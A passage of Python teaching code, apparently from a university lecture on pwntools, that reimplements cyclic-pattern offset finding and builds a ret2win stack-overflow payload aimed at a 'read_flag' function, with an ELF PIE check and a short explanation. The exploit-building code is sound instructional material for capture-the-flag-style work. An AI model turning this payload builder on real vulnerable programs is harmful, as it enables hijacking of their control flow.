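                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern (pwntools: cyclic(length))."""
    out = bytearray()
    for b in de_bruijn():
        if len(out) == length:
            break
        out.append(b)
    return bytes(out)


def cyclic_find(needle) -> int:
    """Offset of a 4-byte subsequence in the pattern (pwntools: cyclic_find).
    Accepts the bytes themselves, or the integer a debugger shows in EIP or at
    the top of the stack, which is unpacked little-endian first.  Returns -1
    if the value did not come from the pattern (the wraparound windows at the
    very end of the full 26**4-byte sequence are ignored)."""
    if isinstance(needle, int):
        needle = struct.pack("<I", needle & 0xFFFFFFFF)
    needle = bytes(needle[:N])
    window = bytearray()
    for i, b in enumerate(de_bruijn()):
        window.append(b)
        if len(window) > N:
            del window[0]
        if len(window) == N and bytes(window) == needle:
            return i - N + 1
    return -1


def p64(value: int) -> bytes:
    """8-byte little-endian packing (pwntools: p64)."""
    return struct.pack("<Q", value)


def ret2win_payload(offset: int, target: int, filler: bytes = b"A") -> bytes:
    """`offset` bytes of filler up to the saved return address, then the
    address of the win function.  With 'no PIE' in checksec the address from
    exe.symbols['read_flag'] is the same every run, so this works as-is."""
    return filler * offset + p64(target)


def elf_type(header: bytes) -> str:
    """Classify an ELF by e_type, which is what checksec's PIE row reflects:
    ET_EXEC -> 'no PIE', text linked at a fixed address (0x400000 on x86-64,
    hence addresses starting with 0x40...); ET_DYN -> 'PIE', base chosen by
    the loader each run (the 0x55.../0x56... addresses under ASLR)."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    fmt = "<H" if header[5] == 1 else ">H"  # EI_DATA: 1 = little-endian
    (e_type,) = struct.unpack(fmt, header[16:18])
    return {ET_EXEC: "no PIE", ET_DYN: "PIE"}.get(e_type, f"other ({e_type})")


# Constructed sample headers: magic, EI_CLASS=2 (64-bit), EI_DATA=1 (LE),
# EI_VERSION=1, OS/ABI and padding zeroed, then e_type at offset 16.
HDR_NOPIE = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + struct.pack("<H", ET_EXEC)
HDR_PIE = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + struct.pack("<H", ET_DYN)


if __name__ == "__main__":
    # Constructed stand-in for ELF("./prog").symbols["read_flag"]; in the real
    # script pwntools reads it out of the binary's symbol table.
    symbols = {"read_flag": 0x401196}
    print(cyclic(40))
    # Suppose the crash shows 0x61616163 in EIP (32-bit) or b"caaa" under RSP:
    offset = cyclic_find(0x61616163)
    print("saved return address is", offset, "bytes into the buffer")
    print(ret2win_payload(offset, symbols["read_flag"]))
    print(elf_type(HDR_NOPIE), "/", elf_type(HDR_PIE))
```

The point of the de Bruijn pattern over 40 A's is the cyclic_find step: the bytes that land in the return address (or the register the crash reports) identify exactly one offset, so the payload builder is called with that number instead of a guess. The elf_type check is the same signal as the 0x40 versus 0x55 address prefix from the lecture, read from the file instead of from a running process.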
pwntools and a simple exploit
From Andrew Novocin February 22, 2023
Zoom Recording ID: 4159319948
UUID: TVL+SJQyTHeLEDGRadZFQA==
Meeting Time: 2023-02-22 03:10:40pmGMT
Department: ECE